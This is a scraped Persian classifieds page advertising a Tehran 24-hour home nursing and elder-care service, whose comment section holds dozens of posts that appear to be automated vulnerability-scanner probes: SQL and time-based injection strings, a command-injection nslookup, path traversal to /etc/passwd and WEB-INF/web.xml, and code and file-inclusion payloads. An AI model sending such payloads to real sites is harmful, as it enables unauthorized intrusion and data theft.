تهران ، کلیه محله ها


ســلامت اول
مرکز پزشکی شبانه روزی
شماره مجوز 110603
3
پرستاری از کودک سالمند بیمار
روزانه شبانه روزی مقطعی
تلفن 1527
27630
02
نازنین واصلی( امتیاز : 5 )
کاربر نیازمندی ها از 6 ماه پیش
احراز شده
هشدار : لطفا پیش از انجام معامله و هر نوع پرداخت وجه، از صحت کالا یا خدمات ارائه شده، به صورت حضوری اطمینان حاصل نمایید.
تلفن همراه: 1
تلفن: 22359801

نظرات

ثبت نظر
asghar asghari

"+response.write(9654971*9277916)+"

0
06/05 21:06
asghar asghari

-1' OR 2+667-667-1=0+0+0+1 or 'YCXgB11B'='

0
06/05 21:06
asghar asghari

-1; waitfor delay '0:0:6' --

0
06/05 21:06
asghar asghari

94m5Y6th'; waitfor delay '0:0:6' --

0
06/05 21:06
asghar asghari

$(nslookup UhiMyjaB)

0
06/05 21:06
asghar asghari

../../../../../../../../../../etc/passwd

0
06/05 21:06
asghar asghari

../../../../../../../../../../etc/passwd.jpg

0
06/05 21:06
asghar asghari

/etc/passwd

0
06/05 21:06
asghar asghari

................etc/passwd

0
06/05 21:06
asghar asghari

WEB-INF/web.xml

0
06/05 21:06
asghar asghari

/WEB-INF/web.xml

0
06/05 21:06
asghar asghari

12345'"\'\");|]*{ <>''💩

0
06/05 21:06
asghar asghari

${9999855+9999699}

0
06/05 21:06
asghar asghari

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

0
06/05 21:06
asghar asghari

1some_inexistent_file_with_long_name.jpg

0
06/05 21:06
asghar asghari

)

0
06/05 21:06
asghar asghari

^(#$!@#$)(()))******

0
06/05 21:06
asghar asghari

'"()

0
06/05 21:06
asghar asghari

;print(md5(acunetix_wvs_security_test));

0
06/05 21:06
asghar asghari

";print(md5(acunetix_wvs_security_test));$a="

0
06/05 21:06
asghar asghari

${@print(md5(acunetix_wvs_security_test))}

0
06/05 21:06
asghar asghari

${@print(md5(acunetix_wvs_security_test))}\

0
06/05 21:06
asghar asghari

1'"

0
06/05 21:06
asghar asghari

\

0
06/05 21:06
asghar asghari

1

0
06/05 21:06
asghar asghari

'"

0
06/05 21:06
asghar asghari

(select convert(int,CHAR(65)))

0
06/05 21:06
asghar asghari

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0
06/05 21:06
asghar asghari

/www.vulnweb.com

0
06/05 21:06
asghar asghari

<!--

0
06/05 21:06
asghar asghari

1'"()&%[removed]XXVZ(9847)[removed]

0
06/05 21:06
asghar asghari

1_9040

0
06/05 21:06
asghar asghari

j2eF5JSz';select pg_sleep(2); --

0
06/05 21:06
asghar asghari

5cf4ff5e816f5d0337674073/.

0
06/05 21:06
asghar asghari

windowswin.ini

0
06/05 21:06
asghar asghari

..\..\..\..\..\..\..\..\windows\win.ini

0
06/05 21:06
asghar asghari

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0
06/05 21:06
asghar asghari

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

0
06/05 21:06
asghar asghari

WEB-INF\web.xml

0
06/05 21:06
asghar asghari

//WEB-INF/web.xml

0
06/05 21:06
asghar asghari

/static/WEB-INF/web.xml

0
06/05 21:06
asghar asghari

/forward:/WEB-INF/web.xml

0
06/05 21:06
asghar asghari

./WEB-INF/web.xml

0
06/05 21:06
asghar asghari

../../WEB-INF/web.xml

0
06/05 21:06
asghar asghari

../../WEB-INF/web.xml?

0
06/05 21:06
asghar asghari

../../../WEB-INF/web.xml?

0
06/05 21:06
asghar asghari

//../....//....//WEB-INF/web.xml

0
06/05 21:06
asghar asghari

../../../../../WEB-INF/web.xml

0
06/05 21:06
asghar asghari

../../../../../../WEB-INF/web.xml

0
06/05 21:06
asghar asghari

../../WEB-INF/web.xml;x=

0
06/05 21:06
asghar asghari

../../../WEB-INF/web.xml;x=

0
06/05 21:06
asghar asghari

1

0
06/09 07:32
asghar asghari

-1 OR 2+555-555-1=0+0+0+1

0
06/09 07:32
asghar asghari

-1' OR 2+253-253-1=0+0+0+1 --

0
06/09 07:32
asghar asghari

0"XOR(if(now()=sysdate(),sleep(2),0))XOR"Z

0
06/09 07:32
asghar asghari

-1; waitfor delay '0:0:2' --

0
06/09 07:32
asghar asghari

1 waitfor delay '0:0:2' --

0
06/09 07:32
asghar asghari

-1;select pg_sleep(4); --

0
06/09 07:32
asghar asghari

-1));select pg_sleep(4); --

0
06/09 07:32
asghar asghari

YjoYuBrt';select pg_sleep(4); --

0
06/09 07:32
asghar asghari

ibvQ65Q6');select pg_sleep(4); --

0
06/09 07:32
asghar asghari

$(nslookup zXY0zVmG)

0
06/09 07:32
asghar asghari

../../../../../../../../../../etc/passwd.jpg

0
06/09 07:32
asghar asghari

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

0
06/09 07:32
asghar asghari

/etc/passwd

0
06/09 07:32
asghar asghari

/etc/passwd

0
06/09 07:32
asghar asghari

/.././.././.././.././.././.././.././../etc/./passwd

0
06/09 07:32
asghar asghari

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

0
06/09 07:32
asghar asghari

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

0
06/09 07:32
asghar asghari

file:///etc/passwd

0
06/09 07:32
asghar asghari

/WEB-INF/web.xml

0
06/09 07:32
asghar asghari

C:\WINDOWS\system32\drivers\etc\hosts

0
06/09 07:32
asghar asghari

../../../../../../../../../../windows/win.ini.jpg

0
06/09 07:32
asghar asghari

windowswin.ini

0
06/09 07:32
asghar asghari

................windowswin.ini

0
06/09 07:32
asghar asghari

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

0
06/09 07:32
asghar asghari

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

0
06/09 07:32
asghar asghari

WEB-INF/web.xml

0
06/09 07:32
asghar asghari

WEB-INF\web.xml

0
06/09 07:32
asghar asghari

${9999414+9999108}

0
06/09 07:32
asghar asghari

1some_inexistent_file_with_long_name.jpg

0
06/09 07:32
asghar asghari

Http://testasp.vulnweb.com/t/fit.txt

0
06/09 07:32
asghar asghari

!(()&&!|*|*|

0
06/09 07:32
asghar asghari

';print(md5(acunetix_wvs_security_test));$a='

0
06/09 07:32
asghar asghari

${@print(md5(acunetix_wvs_security_test))}

0
06/09 07:32
asghar asghari

HttP://testasp.vulnweb.com/t/xss.html?

0
06/09 07:32
asghar asghari

testasp.vulnweb.com/t/xss.html?

0
06/09 07:32
asghar asghari

5cf4ff5e816f5d0337674073

0
06/09 07:32
asghar asghari

5cf4ff5e816f5d0337674073/.

0
06/09 07:32
asghar asghari

\

0
06/09 07:32
asghar asghari

@@vSU4K

0
06/09 07:32
asghar asghari

''""

0
06/09 07:32
asghar asghari

1'"()&%[removed]ozWD(9124)[removed]

0
06/09 07:32

در صورتی که در فرایند کار نیاز به راهنمایی و یا رفع مشکل دارید، می توانید در تمام طول شبانه روز با تلفن 021 1819 تماس حاصل فرمائید.

نیازمندی های راهنمای همشهری اولین رسانه نیازمندی ها در ایران

سازمان نیازمندیهای همشهري جهت پاسخگويي به نيازها و انتظارات مردم در بخش نيازمنديهاي شهري در ابتداي سال 1373 تاسيس و با انتشار راهنماي همشهري فعاليت رسانه اي خود را رسما آغاز كرد. هدف و ماموريت نیازمندیهای همشهري برقراري ارتباط بي واسطه ميان خريداران و فروشندگان كالا و خدمات تمامي ايرانيان است.

ما را دنبال کنید :

استفاده از مطالب این سایت فقط برای مقاصد غیرتجاری و با ذکر منبع بلامانع است، کلیه حقوق این سایت متعلق به موسسه همشهری می باشد